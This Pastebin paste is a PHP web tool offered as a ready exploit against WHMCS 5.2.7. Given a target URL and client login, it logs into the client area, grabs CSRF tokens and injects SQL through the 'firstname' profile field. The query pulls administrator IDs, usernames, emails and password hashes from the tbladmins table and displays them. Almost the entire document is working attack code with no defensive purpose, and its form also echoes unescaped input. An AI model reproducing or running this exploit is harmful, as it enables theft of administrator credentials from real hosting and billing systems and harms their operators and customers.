Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>Master WHMCS 5.2.7 SQL inJecTion</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
- <style type='text/css'>
- body{
- margin: 0;
- padding:0;
- background:black;
- color:white;
- font-family:"Times New Roman",Georgia,Serif;
- }
- </style>
- </head>
- <body >
- <center>
- <h1> Master WHMCS 5.2.7 SQL inJecTion</h1>
- <img src="http://www.whmcs.com/wp-content/themes/whmcs/images/logo_whmcs.png" /> <br /><br />
- <?
- if ($_POST['Submit1']){
- echo "";
- set_time_limit(0);
- function cut($start,$end,$top){
- $c =strlen($start);
- $desc= strstr("$top","$start");
- $count = strpos("$desc","$end");
- $desc = substr($desc,$c,$count-$c);
- return $desc;
- }
- $url= $_POST['user'];
- $user= $_POST['email'];
- $passw= $_POST['pass'];
- $sqll= "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins";
- $fp = fopen("cookie.txt", "w+");
- $Cookie = realpath('cookie.txt');
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"$url/login.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,5);
- $exec=curl_exec($curl);
- curl_close($curl);
- $tok = cut('"token" value="','" />',$exec);
- $postd= "username=$user&password=$passw&token=$tok";
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"$url/dologin.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_POSTFIELDS, $postd);
- curl_setopt($curl, CURLOPT_COOKIEJAR, "$Cookie");
- curl_setopt($curl,CURLOPT_TIMEOUT,5);
- $exez=curl_exec($curl);
- curl_close($curl);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"$url/clientarea.php?action=details");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_COOKIEFILE, "$Cookie");
- curl_setopt($curl,CURLOPT_TIMEOUT,5);
- $exes=curl_exec($curl);
- curl_close($curl);
- $tokZ = cut('"token" value="','" />',$exes);
- $zz= "AES_ENCRYPT(1,1), firstname= ($sqll)";
- $ex="token=$tokZ&firstname=$zz&lastname=1&companyname=1&email=$user&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes";
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"$url/clientarea.php?action=details");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_POST, TRUE);
- curl_setopt($curl, CURLOPT_POSTFIELDS, $ex);
- curl_setopt($curl, CURLOPT_COOKIEFILE, "$Cookie");
- curl_setopt($curl,CURLOPT_TIMEOUT,5);
- $exef=curl_exec($curl);
- curl_close($curl);
- $Masterr = cut('="firstname" value="','" />',$exef);
- if(!empty($Masterr)){
- $Masterr= str_replace (',','<br />',$Masterr);
- echo "$Masterr";
- }
- else{
- echo "<h2>Failed .. !!</h2>";
- }
- }
- ?>
- <b>
- <FORM NAME ="form1" METHOD ="POST" ACTION ="">
- <br>
- Site : <INPUT NAME = "user" style="width: 410px; " value="<? echo $_POST['user'];?>"><br><br>
- mail : <INPUT NAME = "email" style="width: 410px; " value="<? echo $_POST['email'];?>"><br><br>
- pass : <INPUT NAME = "pass" style="width: 410px; " value="<? echo $_POST['pass'];?>"><br><br>
- <br> <INPUT TYPE = "Submit" Name = "Submit1" VALUE = "Expoit" style="width: 90px">
- </FORM>
- <p>Developped By The_Master</p>
- <p>Th3.M4st3r@Yahoo.CoM</p>
- <p>SEc4ever.CoM</p>
- </b>
- </div>
- <center></body>
- </html>
Add Comment
Please, Sign In to add comment